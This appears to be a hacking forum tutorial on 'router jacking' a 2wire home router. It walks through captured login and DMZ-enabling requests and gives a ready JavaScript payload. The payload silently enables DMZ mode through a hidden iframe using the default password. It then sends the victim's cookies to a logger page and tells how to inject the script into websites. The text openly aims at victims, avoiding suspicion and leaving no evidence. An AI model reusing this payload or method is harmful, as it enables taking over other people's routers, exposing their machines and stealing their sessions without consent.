Hello... Today I made some code to enable DMZ mode on my router (2wire) and I am going to show you how you can make your own scripts to do the same!
Note: All routers are different. This scripts works on my 2wire router and is not guaranteed to work on others.
Ok, the basic idea of this script we will make is to abuse certain "features" that come with the router and take advantage of that fact that most people keep their router password at default because they can only be accessed from the inside right???. Not exactly ...Some of features we could take advantage of are Remote administration, Enabling DMZ, Disabling firewall protection, and others. To accomplish this we must first find a way to authenticate ourselves, second find a way to enable or change the features we please, third creating our router jacking script.
* Authentication[/*:m:10xwgjok]
Router authentication varies on different routers so, we need to find how the user will authenticate and how we can do it using a URL. If the router uses a popup and makes you login as soon as you try to access it then you can authenticate simply by using
Code:
http://username:password@192.168.254.254/But, if the router uses form authentication then you must use other methods. Since my router makes you enter only a password when trying to access special components I could not use the usernameassword method because I only need to enter a password. I will show you exactly how I found how to login on my router using just a URL.
Note: Form authentication uses form fields are what we usually see on current sites like MySpace etc...If the router uses these try the
http://usernameassword method anyway... it may work.
First I wanted to see what http request my browser was making to login so, I used burp proxy (Part of the burp suite) to watch the http request made by my browser.
Note: Burp Suite can be downloaded from
http://portswigger.net/suite/.
I logged in and grabbed the following request with burp proxy.
Code:
POST /xslt HTTP/1.1
Host: 192.168.254.254
User-Agent: Removed for obvious reasons.
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer:
http://192.168.254.254/xslt?PAGE=E02...T&NEXTPAGE=E02Content-Type: application/x-www-form-urlencoded
Content-Length: 108
PAGE=A02_POST&THISPAGE=A02_POST&NEXTPAGE=E02&CMSKICK=&PAGE=E02&THISPAGE=A02_POST&NEXTPAGE=E02&PASSWORD=admin
As you can see, I am using the default password of admin. The request submits the parameters
Code:
PAGE=A02_POST&THISPAGE=A02_POST&NEXTPAGE=E02&CMSKICK=&PAGE=E02&THISPAGE=A02_POST&NEXTPAGE=E02&PASSWORD=admin
So I decided to use them in a URL like so
Code:
http://192.168.254.254/xslt?PAGE=A02...PASSWORD=adminAnd I was successfully logged in!!!
* Tampering with settings
Now, we will look for the features we want to tamper with... My router has a firewall we could disable and a DMZ mode we could enable. In this guide I will only enable the DMZ but, the firewall settings could be changed in the same way.
First I watched the request made when I enabled the DMZ mode and got the following
Code:
POST /xslt HTTP/1.1
Host: 192.168.254.254
User-Agent: Removed for obvious reasons.
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer:
http://192.168.254.254/xsltCookie: WHPL=TRUE%3B+SESSKEY%3DWS-3342-1908300%3B+
Content-Type: application/x-www-form-urlencoded
Content-Length: 94
PAGE=E02_POST_DMZ&THISPAGE=E02&NEXTPAGE=E02_POST_DMZ&NODEID=0&category=ALL&FWALLOW=ALL_TRAFFIC
As you may of noticed, we now are submitting the cookie we received when we logged in. The problem with this is javascript will not store the cookies like a browser.I still needed the URL to activate DMZ mode anyway so just like last time I submitted the parameters within the URL like so
Code:
http://192.168.254.254/xslt?PAGE=E02_POST_DMZ&THISPAGE=E02&NEXTPAGE=E02_POST_DMZ&NODEID=0&category=ALL&FWALLOW=ALL_TRAFFICOf course this failed because a valid cookie wasn't submitted.Now I needed to find URL that would log me in and enable the DMZ at the same time. To find the appropriate parameters I opened my browser and tried to change the DMZ without being authenticated by using the URL above. It then said I needed a password to access that area. Can you guess what I did next??? Entered my password and grabbed the request sent to the router. That request looked something like this
Code:
POST /xslt HTTP/1.1
Host: 192.168.254.254
User-Agent: Removed for obvious reasons.
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer:
http://192.168.254.254/xslt?PAGE=A02_POSTCookie: WHPL=TRUE%3B+SESSKEY%3DWS-3342-1908300%3B+
Content-Type: application/x-www-form-urlencoded
Content-Length: 214
PAGE=A02_POST&THISPAGE=E02&NEXTPAGE=E02_POST_DMZ&CMSKICK=&PAGE=E02_POST_DMZ&THISPAGE=E02&NEXTPAGE=E02_POST_DMZ&NODEID=0&category=ALL&FWALLOW=ALL_TRAFFIC&PASSWORD=admin
Notice the PASSWORD parameter....
The parameter logged me in and enabled DMZ mode!! Exactly what we want!!!! Just like before I added the parameter to a URL like this
Code:
http://192.168.254.254/xslt?PAGE=A02_POST&THISPAGE=E02&NEXTPAGE=E02_POST_DMZ&CMSKICK=&PAGE=E02_POST_DMZ&THISPAGE=E02&NEXTPAGE=E02_POST_DMZ&NODEID=0&category=ALL&FWALLOW=ALL_TRAFFIC&PASSWORD=admin * Making our script
Now we need to make a .js file that will invisibly change change what we want and open a iframe to a valid page. To do this we will echo the javascript out so we can use the <iframe> tag inside our javascript file.... The code I came up with is
Code:
document.write('<body topmargin="0" leftmargin="0" rightmargin="0" bottommargin="0">')
document.write('<iframe frameborder="0" scrolling="no" height="0" width="0" src="
http://192.168.254.254/xslt?PAGE=A02_POST&THISPAGE=E02&NEXTPAGE=E02_POST_DMZ&CMSKICK=&PAGE=E02_POST_DMZ&THISPAGE=E02&NEXTPAGE=E02_POST_DMZ&NODEID=0&category=ALL&FWALLOW=ALL_TRAFFIC&PASSWORD=admin"></iframe>');
document.write('<iframe src="
http://ww.google.com/" width="100%" height="100%" frameborder="0"</iframe>');
Note: As you can see, we also used the body tags..echoing out javascript can be very useful for many different things. Remember this.
This script opens an invisible iframe to change the victims routers settings and open a borderless iframe to google...Now you might be wondering how you will log their IP...Well we will make the script redirect to a info logger after 8 seconds to log the date, referer, ip, and guess what? Cookies as a bonus . Here is the updated script
Code:
document.write('<body topmargin="0" leftmargin="0" rightmargin="0" bottommargin="0">')
document.write('<iframe frameborder="0" scrolling="no" height="0" width="0" src="
http://192.168.254.254/xslt?PAGE=A02_POST&THISPAGE=E02&NEXTPAGE=E02_POST_DMZ&CMSKICK=&PAGE=E02_POST_DMZ&THISPAGE=E02&NEXTPAGE=E02_POST_DMZ&NODEID=0&category=ALL&FWALLOW=ALL_TRAFFIC&PASSWORD=admin"></iframe>');
document.write('<iframe src="
http://ww.google.com/" width="100%" height="100%" frameborder="0"</iframe>')
setTimeout("document.location='info.php?c='+document.cookie",8000);
Making the script redirect to google (Because thats where the iframe location was...This way we don't make the victim suspicious and there will be no evidence they were hacked because the page will redirect to a valid site) after 8 seconds allows the router jacker to completely load on most systems. The info.php file we are using is just a cookie logger. You can find out how to make one at
http://www.criticalsecurity.net/index.php?s=6270e82f7760b429bd06897de9054002&showtopic=7137&pid=213099&st=200&#entry213099. Everyone thank 1nj3cth4x! Ok now we have hacked there router, logged their ip, stolen their cookies, and logged the date....We can now connect to ports they have open on their box.
Tip: Don't forget to look for other "features" you can abuse.
Note: This router jacker works on my router. You can follow the same steps to hack other routers also...
Lastly, you need to know how to inject the script... It as easy as
Code:
<script src="
http://subdomain.host.com/script.js"></script>
You may be wondering how you know what type of router your victim is using?? Well, in the next tutorial I will show you how to enumerate routers.
Soon I will release router hacking packs for different routers... Look for them in the exploits section .
OK! I hope you learned allot and enjoyed reading! Please leave comments and suggestions..
